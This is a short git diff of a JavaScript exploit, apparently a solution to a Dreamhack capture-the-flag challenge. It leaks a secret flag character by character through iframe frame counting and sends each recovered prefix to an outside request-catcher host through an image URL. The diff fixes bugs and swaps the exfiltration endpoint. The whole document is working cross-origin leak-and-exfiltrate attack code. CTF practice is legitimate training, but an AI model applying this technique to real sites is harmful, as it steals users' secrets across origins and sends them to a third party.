--- a/static/js/test.html
+++ b/static/js/test.html
@@ -9,12 +9,11 @@
 
             iframe.onload = () => {
                 try{
-                    result = iframe.contentWindow.frames.length;
+                    let result = iframe.contentWindow.frames.length;
                     document.body.removeChild(iframe);
                     resolve(result > 0);
                 }
                 catch(e){
-                    document.body.removeChild(iframe);
                     document.body.removeChild(iframe);
                     resolve(false);
                 }
@@ -28,7 +27,7 @@
     }
 
     async function exploit(){
-        let chars = "0123456789abcdef";
+        let chars = "0123456789abcdef}";
         let secret = "DH{";
 
         while(!secret.includes("}")){
@@ -41,7 +40,7 @@
                 if(rslt.success){
                     secret += rslt.char;
                     found = true;
-                    img.src = `https://bmfnfms.request.dreamhack.games/${secret}`;
+                    img.src = `https://sypkhxt.request.dreamhack.games/${secret}`;
                     break;
                 }
             }
